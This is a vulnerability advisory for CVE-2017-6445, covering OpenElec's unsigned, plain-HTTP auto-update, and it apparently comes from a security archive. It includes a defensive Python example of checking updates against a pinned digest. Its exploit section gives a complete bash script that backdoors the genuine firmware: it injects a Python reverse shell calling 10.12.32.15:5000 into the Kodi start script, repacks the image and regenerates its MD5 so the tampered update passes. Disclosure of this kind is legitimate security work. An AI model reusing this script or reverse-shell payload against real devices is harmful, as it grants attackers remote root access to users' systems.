OpenElec 6.0.3 / 7.0.1 Code Execution

Published: 06 Mar 2017 00:00:00. Reported by Wolfgang Hotwagner. Type: packetstorm. Source: packetstormsecurity.com

OpenElec 6.0.3 / 7.0.1 Code Execution vulnerability through Man-In-The-Middl

Related

| Family | Title | Published | Source |
|---|---|---|---|
| 0day.today | OpenElec 6.0.3 / 7.0.1 Code Execution Vulnerability | 6 Mar 2017 00:00 | zdt |
| CVE | CVE-2017-6445 | 5 Mar 2017 20:00 | cve |
| Cvelist | CVE-2017-6445 | 5 Mar 2017 20:00 | cvelist |
| EUVD | EUVD-2017-15502 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2017-6445 | 5 Mar 2017 20:59 | nvd |
| OSV | CVE-2017-6445 | 5 Mar 2017 20:59 | osv |
| Prion | Design/Logic Flaw | 5 Mar 2017 20:59 | prion |
During my research about update mechanisms of open-source software I
discovered vulnerabilities in OpenElec.
  
== [ OVERVIEW ] ==  
  
System affected: OpenElec  
CVE: CVE-2017-6445  
Vulnerable component: auto-update feature  
Software-Version: 6.0.3, 7.0.1  
User-Interaction: Reboot required  
Impact: Remote Code Execution with root permission  
  
== [ PRODUCT DESCRIPTION ] ==  
  
According to its website "Open Embedded Linux Entertainment Center  
(OpenELEC) is a small Linux based Just Enough Operating System (JeOS)  
built from scratch as a platform to turn your computer into a Kodi media  
center."  
  
== [ VULNERABILITY ] ==  
  
Automatic updates are disabled by default. Once enabled, OpenElec
connects to http://update.openelec.tv/updates.php to check whether a
newer version is available. If there is one, OpenElec downloads it from
http://releases.openelec.tv/<version>.tar (or from any other URL returned
by update.openelec.tv).

The auto-update feature of OpenElec uses neither encrypted connections
nor signed updates, so a man-in-the-middle can manipulate the update
package to gain root access remotely. The downloaded firmware only runs
after the OpenElec system has been rebooted, so user interaction is
required at that point.
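The weakness has two halves: the archive travels over plain HTTP, and the only integrity data it carries (target/SYSTEM.md5) sits inside the same archive, so whoever rewrites SYSTEM can regenerate the sidecar. The Python below is an added example, not OpenElec's code, showing why an in-archive checksum does not help and what the minimal fix looks like: compare the whole download against a digest the device obtained over a channel the network path cannot alter (a signed manifest, HTTPS with a pinned certificate, or a value baked into the running firmware). The archive layout built by build_update_tar, the constant VERSION and the pinned digest are all constructed for the example.

```python
import hashlib
import hmac
import io
import tarfile

VERSION = "OpenELEC-example-7.0.1"  # constructed name; mirrors the <version>/target/SYSTEM layout


def build_update_tar(system_image: bytes) -> bytes:
    """Constructed sample archive: <version>/target/SYSTEM plus the SYSTEM.md5
    sidecar, the same pair the advisory's script rewrites."""
    md5_line = hashlib.md5(system_image).hexdigest() + "  target/SYSTEM\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in ((f"{VERSION}/target/SYSTEM", system_image),
                           (f"{VERSION}/target/SYSTEM.md5", md5_line.encode())):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _read_member(tar: tarfile.TarFile, suffix: str) -> bytes:
    """Return the contents of the first member whose path ends with suffix."""
    for member in tar.getmembers():
        if member.name.endswith(suffix):
            return tar.extractfile(member).read()
    raise KeyError(suffix)


def sidecar_md5_matches(tar_bytes: bytes) -> bool:
    """Check SYSTEM against the SYSTEM.md5 shipped beside it. This catches
    corruption only: the sidecar is unauthenticated and travels with the file
    it describes, so a rewritten archive passes just as easily."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        system = _read_member(tar, "/target/SYSTEM")
        md5_line = _read_member(tar, "/target/SYSTEM.md5").decode()
    return md5_line.split()[0] == hashlib.md5(system).hexdigest()


def publish_digest(tar_bytes: bytes) -> str:
    """Vendor side: the digest that must reach the device out of band
    (signed manifest, pinned-cert HTTPS, or baked into the firmware)."""
    return hashlib.sha256(tar_bytes).hexdigest()


def verify_update(tar_bytes: bytes, pinned_sha256: str) -> bool:
    """Device side: accept the download only if the whole archive matches the
    pinned digest. Anything changed on the path, including a regenerated
    SYSTEM.md5, changes the digest."""
    actual = hashlib.sha256(tar_bytes).hexdigest()
    return hmac.compare_digest(actual, pinned_sha256)


if __name__ == "__main__":
    genuine = build_update_tar(b"squashfs image bytes (constructed)")
    pinned = publish_digest(genuine)
    # A download altered on the path, with SYSTEM.md5 regenerated to match:
    altered = build_update_tar(b"squashfs image bytes (constructed) + extra")
    print("sidecar md5, altered archive:", sidecar_md5_matches(altered))    # True
    print("pinned digest, altered archive:", verify_update(altered, pinned))  # False
    print("pinned digest, genuine archive:", verify_update(genuine, pinned))  # True
```

The digest check is deliberately applied to the whole tarball rather than to SYSTEM alone, so that the updater never has to trust anything it unpacked before deciding whether to install it; a real deployment would pin a signing key rather than a bare digest, but the ordering (verify the download, then unpack) is the part this example exists to show.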
  
== [ EXPLOIT ] ==  
  
The following script downloads an OpenElec firmware image, extracts it,
places a reverse shell into the Kodi start script and finally repackages
the result as a backdoored firmware:
  
```bash
#!/bin/bash
OPENELEC="OpenELEC-RPi2.arm-7.0.1"
DOWNLOADURL="http://releases.openelec.tv/"
TMP="/tmp"

cd $TMP
# fetch and unpack the genuine release archive
test -e ${OPENELEC}.tar || wget $DOWNLOADURL/${OPENELEC}.tar
test -d $OPENELEC || tar xvf ${OPENELEC}.tar
test -d $TMP/unpacked || mkdir $TMP/unpacked

cd $TMP/unpacked

# unpack the root filesystem image (target/SYSTEM is a squashfs)
test -d $TMP/unpacked/squashfs-root || unsquashfs $TMP/$OPENELEC/target/SYSTEM

# drop the reverse-shell loop into the image
cat > $TMP/unpacked/squashfs-root/usr/bin/revshell.sh << EOF
#!/bin/bash
while true
do
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.15",5000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /dev/null 2>&1
done
EOF

chmod 777 $TMP/unpacked/squashfs-root/usr/bin/revshell.sh

# start it from the Kodi start script, right after its "trap cleanup TERM" line
awk '/trap cleanup TERM/ { print; print "/usr/bin/revshell.sh &"; next }1' $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh > $TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh
mv $TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh
chmod 777 $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh

# repack the image and regenerate the MD5 sidecar shipped inside the archive
mksquashfs squashfs-root/ SYS -noappend -comp gzip
mv SYS $TMP/$OPENELEC/target/SYSTEM
cd $TMP/$OPENELEC
md5sum target/SYSTEM > target/SYSTEM.md5
cd $TMP
tar cvf $OPENELEC.evil.tar $OPENELEC

test -d $TMP/unpacked && rm -fr $TMP/unpacked
test -d $OPENELEC && rm -rf $OPENELEC
```
  
== [ MITIGATION ] ==  
  
Ensure that auto-update is disabled.  
  
== [ Timeline ] ==  
  
* This bug was reported on December 03 2016.
* Published as a zero-day on March 04 2017 after no reply from OpenElec.
  
== [ CREDITS ] ==  
  
CVE-2017-6445 was discovered by Wolfgang Hotwagner  
(https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle)  
  
